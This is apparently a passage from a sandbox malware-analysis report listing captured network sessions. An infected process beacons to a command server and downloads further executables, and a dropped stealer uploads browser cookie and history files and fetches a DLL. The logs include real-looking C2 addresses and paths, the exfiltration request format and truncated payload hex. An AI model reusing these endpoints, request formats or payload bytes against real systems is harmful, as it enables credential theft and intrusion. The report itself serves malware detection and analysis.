@0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49861	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:58:41.647392035 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 33 35 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015353001&unit=246122658369
Dec 14, 2024 23:58:43.004734993 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:58:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49863	185.215.113.16	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:58:43.128890991 CET	55	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 14, 2024 23:58:44.469878912 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:58:43 GMT Content-Type: application/octet-stream Content-Length: 970752 Last-Modified: Sat, 14 Dec 2024 22:30:05 GMT Connection: keep-alive ETag: "675e06ed-ed000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 de 06 5e 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 20 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL^g" w@0c@@@d\|@Leu4@.text `.rdata@@.datalpH@.rsrcLe@f@@.relocuvZ@B
Dec 14, 2024 23:58:44.470035076 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
Dec 14, 2024 23:58:44.470068932 CET	1236	IN	Data Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7 Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY\|#l)\DItv
Dec 14, 2024 23:58:44.470693111 CET	1236	IN	Data Raw: 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c Data Ascii: N^VW3DNF\|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj
Dec 14, 2024 23:58:44.470726013 CET	1236	IN	Data Raw: 00 5f 5e 5b c9 c2 08 00 49 eb 89 41 eb 86 8d 47 01 89 02 eb dc e8 5b 01 00 00 84 c0 74 0e 8b ca e8 50 01 00 00 84 c0 74 03 b0 01 c3 32 c0 c3 55 8b ec 51 51 56 8b f1 80 be 6d 01 00 00 00 8b 86 68 01 00 00 75 53 ff 70 04 e8 1e 09 00 00 8d 4d ff c7 Data Ascii: _^[IAG[tPt2UQQVmhuSpMEQMQPx$}dtmhuIEA^j@0I0uuUQQVW}EPEEPWNx8OEfx3
Dec 14, 2024 23:58:44.470760107 CET	1236	IN	Data Raw: 00 83 f8 12 0f 8d e0 04 04 00 83 e8 04 83 f8 0a 77 94 ff 24 85 85 27 40 00 6a 7f 58 66 3b d8 0f 84 c2 06 04 00 8b 19 33 c0 66 85 c0 74 1c 8b 45 90 40 89 45 90 8b 1c 81 0f b7 43 08 66 3b 85 50 ff ff ff 75 e4 e9 9d 06 04 00 83 3b 05 75 df 8b 04 91 Data Ascii: w$'@jXf;3ftE@ECf;Pu;u3f9X'ULUf9Y]79^99L99!:9#, rU]
Dec 14, 2024 23:58:44.471601963 CET	1236	IN	Data Raw: 85 79 02 04 00 38 5f 08 75 1c 8b 47 04 6a 08 50 8b 70 04 e8 c8 d5 01 00 59 59 89 77 04 88 5f 09 ff 0f 5f 5e 5b c3 b3 01 eb f3 55 8b ec 56 8b f1 80 7e 09 00 0f 85 5f 02 04 00 6a 08 e8 ad d5 01 00 59 8b 4d 08 8b 09 89 08 8b 4e 04 89 48 04 89 46 04 Data Ascii: y8_uGjPpYYw__^[UV~_jYMNHF^]UQSV3W8^?8^u7~G0EtO ,O$j8WIEYYF^_^[UWVj8)YuON0w^_]UVuWO
Dec 14, 2024 23:58:44.471637011 CET	1236	IN	Data Raw: a3 88 13 4d 00 ff d6 57 ff 35 8c 13 4d 00 ff d6 5f 5e c3 55 8b ec 83 ec 40 a1 58 13 4d 00 56 33 f6 a3 04 19 4d 00 6a 0f c7 45 c4 30 00 00 00 c7 45 c8 2b 00 00 00 89 75 d0 c7 45 d4 1e 00 00 00 89 45 d8 89 75 e0 ff 15 3c c7 49 00 89 45 e4 8b 45 10 Data Ascii: MW5M_^U@XMV3MjE0E+uEEu<IEEEEEEPuEIE}A0IhIfM IMEPEE;Ijjj!jjIh5M\M4IPj5\MI5`M^UVW
Dec 14, 2024 23:58:44.471671104 CET	1236	IN	Data Raw: cc 00 00 00 2d 8f 00 00 00 0f 84 d8 fc 03 00 48 83 e8 01 0f 84 ba fc 03 00 2d ff 01 00 00 0f 84 94 fc 03 00 2d ef 00 00 00 0f 84 8f 00 00 00 3b 3d 28 25 4d 00 0f 84 58 fc 03 00 ff 75 0c ff 75 08 57 56 ff 15 08 c7 49 00 5f 5e 5b 8b e5 5d c3 85 c0 Data Ascii: -H--;=(%MXuuWVI_^[]tt%jVIM73jhjV$IhI I=M(%MuIMuQQVMjIU<SVWj,EE0jP
Dec 14, 2024 23:58:44.472517014 CET	1236	IN	Data Raw: 4d 00 ff 53 56 57 33 db c7 05 94 19 4d 00 01 01 01 01 68 58 cb 49 00 89 1d 90 19 4d 00 66 89 1d 98 19 4d 00 c6 05 9a 19 4d 00 01 c7 05 9c 19 4d 00 09 00 00 00 89 1d a8 19 4d 00 e8 0a 66 00 00 68 3c cb 49 00 b9 bc 19 4d 00 e8 fb 65 00 00 b9 cc 19 Data Ascii: MSVW3MhXIMfMMMMfh<IMeMrMrMrM4MMMMMMMMj_MMMMMMMMM M$M0Mrud
Dec 14, 2024 23:58:44.590125084 CET	1236	IN	Data Raw: 53 52 51 ff 15 18 c0 49 00 85 c0 75 4f 8b 45 0c 57 8d 3c 00 8d 45 fc 89 7d fc 50 56 53 53 ff 75 08 ff 75 f8 ff 15 20 c0 49 00 85 c0 75 15 8b 45 fc d1 e8 89 45 fc 3b 45 0c 73 18 33 c9 66 89 0c 46 b3 01 ff 75 f8 ff 15 1c c0 49 00 8a c3 5f 5e 5b c9 Data Ascii: SRQIuOEW<E}PVSSuu IuEE;Es3fFuI_^[3fD72V\|M]8MW3=MZ=@M M@I95(Mv"$Mj4$MYY<F;5(Mr5$M=(MYMM<I5M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49879	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:58:48.906145096 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 33 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015354001&unit=246122658369
Dec 14, 2024 23:58:50.257982969 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:58:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49881	185.215.113.16	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:58:50.628062010 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 14, 2024 23:58:51.938374996 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:58:51 GMT Content-Type: application/octet-stream Content-Length: 2746368 Last-Modified: Sat, 14 Dec 2024 22:30:33 GMT Connection: keep-alive ETag: "675e0709-29e800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2a 00 00 04 00 00 21 35 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$`* `@ !5`Ui` @ @.rsrc`2@.idata 8@eacxpgzo)):@bagugiyz @)@.taggant@`")@
Dec 14, 2024 23:58:51.938515902 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:51.938560009 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:51.939071894 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:51.939115047 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:51.939157009 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:51.940010071 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:51.940045118 CET	1236	IN	Data Raw: 80 f5 cd 5c 58 52 ce a1 e0 21 cc 19 d1 77 69 4f 85 6e 63 bf 45 0c 90 ff 14 e7 b2 9e aa 6c 02 b0 38 79 38 c3 ae 4a 43 7f 89 a2 8a 51 be 30 fe 9c f5 e8 ae 4f 36 fb f1 9b e3 0a cb 95 f3 e0 35 ad f1 f3 de 5f 58 fe da 77 44 17 ad 91 d5 11 cb 2c 26 da Data Ascii: \XR!wiOncEl8y8JCQ0O65_XwD,&@~HXf"d8,1]G5c218)K:3~l]uefSw^mzZKgenr/
Dec 14, 2024 23:58:51.940077066 CET	1236	IN	Data Raw: 74 f6 d4 71 9c f6 a8 bd 84 c1 2d 51 db 19 d2 ce 22 01 de 55 50 0c b0 be 15 7e 88 61 fc 39 d8 5c 22 01 98 bf 83 59 9c 62 8d cc 5a d9 fc f6 94 5f 22 55 d4 09 50 3d 64 53 4e 92 7f 15 24 19 70 b6 55 1a 38 35 db 75 c1 e7 fc 79 a0 5c 62 ea 58 29 6a b1 Data Ascii: tq-Q"UP~a9\"YbZ_"UP=dSN$pU85uy\bX)jQ}r(H l:sOP~"Y]]KuON_3]YK1DL2\\|(o$W4f=uJ:Eyrj9{p&tc
Dec 14, 2024 23:58:51.940908909 CET	1236	IN	Data Raw: 3d 13 dd 66 56 31 d4 b2 30 5e 04 5f e9 dd c4 d0 ef cc d6 09 2c e6 88 86 d8 2f 83 7e 4f d1 7a 83 46 1e 82 0c ee 72 b6 a0 72 50 f9 b3 05 eb 99 f6 32 f9 78 6f dc 5c 45 7d f2 c9 72 7d 43 2c 64 3a 6a e6 60 4e f0 50 68 64 ed a3 39 5c 64 86 be 2d a1 df Data Ascii: =fV10^_,/~OzFrrP2xo\E}r}C,d:j`NPhd9\d-??7o$+\|38yYPWoOLK\:E^z<Pjd;MQO}KQ':pN@Pf~C1T\$iraC7zmVQ&>
Dec 14, 2024 23:58:52.058518887 CET	1236	IN	Data Raw: e4 3e ed 8a 0a ed f3 b5 01 91 ca a0 c6 cd b6 bc d1 e6 c2 1c de ed 94 a9 d2 03 e0 06 dd fe ef 4d de fd 6a 6b 23 ea 26 f2 51 d2 f0 17 3f bc d2 ce 25 b7 7d 60 3d 5b ac 99 25 cb c6 70 44 2a 60 6b d4 58 6e 62 4e 2c 95 8e a2 16 cf ec 92 40 63 22 42 d1 Data Ascii: >Mjk#&Q?%}`=[%pD*`kXnbN,@c"BjGbT'A^OSFLJ3Vy;(g?NLcmNO2y:It`== (vzvm^:j@^S+2n>#cK`imqA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49921	185.215.113.206	80	3300	C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:58:56.025038004 CET	621	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFIJJEGHDAEBGCAKJKFH Host: 185.215.113.206 Content-Length: 419 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 [TRUNCATED] Data Ascii: ------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------KFIJJEGHDAEBGCAKJKFH--
Dec 14, 2024 23:58:57.855999947 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 23:58:58.411376953 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHIECBAFBFHIJKFIJDAK Host: 185.215.113.206 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Dec 14, 2024 23:58:58.411376953 CET	1451	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 Data Ascii: ------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
Dec 14, 2024 23:58:59.469633102 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 23:58:59.513906002 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEH Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="file"------HJJJECFIECBGDGCAAAEH--
Dec 14, 2024 23:59:00.456722975 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 23:59:01.484344959 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBFHJEGDAFHIJKECFBKJ Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 42 46 48 4a 45 47 44 41 46 48 49 4a 4b 45 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 48 4a 45 47 44 41 46 48 49 4a 4b 45 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 48 4a 45 47 44 41 46 48 49 4a 4b 45 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------EBFHJEGDAFHIJKECFBKJContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------EBFHJEGDAFHIJKECFBKJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EBFHJEGDAFHIJKECFBKJContent-Disposition: form-data; name="file"------EBFHJEGDAFHIJKECFBKJ--
Dec 14, 2024 23:59:02.409535885 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 23:59:03.861516953 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 14, 2024 23:59:04.330842972 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:04 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
